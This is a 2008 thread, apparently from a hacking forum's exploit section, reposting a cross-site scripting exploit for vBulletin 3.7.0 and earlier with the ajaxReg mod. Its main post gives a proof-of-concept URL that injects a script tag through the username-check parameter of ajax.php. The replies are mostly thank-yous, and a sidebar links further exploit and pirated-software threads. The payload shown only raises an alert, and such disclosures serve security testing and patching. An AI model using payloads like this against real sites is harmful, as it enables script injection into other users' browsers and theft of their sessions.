vBulletin <= 3.7.0 XSS Exploit (ajax.php - ajaxReg mod)

**Armageddon** · 08-04-2008

vBulletin 3.7.0 <= XSS Explot

* Requires ajaxReg mod (a common mod)

Found by RoBOTNIK
dieterfleig@yahoo.com
l3vel-69.net

What is ajaxReg mod?
ajaxReg is a common mod used for checking registration details while you are typing them.

ajaxReg:

Code:

http://www.vbulletin.org/forum/showthread.php?t=144869

POC:

Code:

http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #
http://www.site.com/forums/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>

trazan.sd · 10-26-2008

hello ..............

luffya · 11-19-2008

thank you

kvj003 · 11-22-2008

@b2@ · 3 Weeks Ago

thank you

DOS · 2 Weeks Ago

thank you

08-04-2008	#1 (permalink)
Armageddon Studentz Join Date: Jun 2006 Location: On port u forgot to secure! Age: 18 Posts: 6,125 Thanks: 57 Thanked 171 Times in 126 Posts Rep Power: 250 Awards Showcase Total Awards: 6	vBulletin <= 3.7.0 XSS Exploit (ajax.php - ajaxReg mod) vBulletin 3.7.0 <= XSS Explot * Requires ajaxReg mod (a common mod) Found by RoBOTNIK dieterfleig@yahoo.com l3vel-69.net What is ajaxReg mod? ajaxReg is a common mod used for checking registration details while you are typing them. ajaxReg: Code: http://www.vbulletin.org/forum/showthread.php?t=144869 POC: Code: http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT # http://www.site.com/forums/ajax.php?do=CheckUsername&param=<script>alert('xss');</script> __________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

11-22-2008	#4 (permalink)
kvj003 Senior Member Join Date: Jun 2008 Posts: 108 Thanks: 15 Thanked 34 Times in 12 Posts Rep Power: 27	gr8

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
New !! Vbulletin Exploit [All Versions]	Immortal	Exploit Codes	38	11-29-2008 07:53 PM
Vbulletin Latest exploit not mine	RampageX11	Exploit Codes	8	11-09-2008 02:23 PM
ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit	MaDHA¢KeR™	Exploit Codes	0	08-02-2008 03:16 PM
Telerik RadControls for ASP.NET AJAX Q1 2008	Armageddon	Full Appz	0	04-28-2008 06:38 PM

10-26-2008	#2 (permalink)
trazan.sd Leecher Join Date: Oct 2008 Posts: 1 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 0	hello ..............

11-19-2008	#3 (permalink)
luffya Leecher Join Date: Nov 2008 Age: 28 Posts: 6 Thanks: 1 Thanked 0 Times in 0 Posts Rep Power: 0	thank you

3 Weeks Ago	#5 (permalink)
@b2@ Leecher Join Date: Dec 2008 Age: 20 Posts: 7 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 0	thank you

2 Weeks Ago	#6 (permalink)
DOS Junior Member Join Date: Dec 2008 Posts: 18 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 3	thank you

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)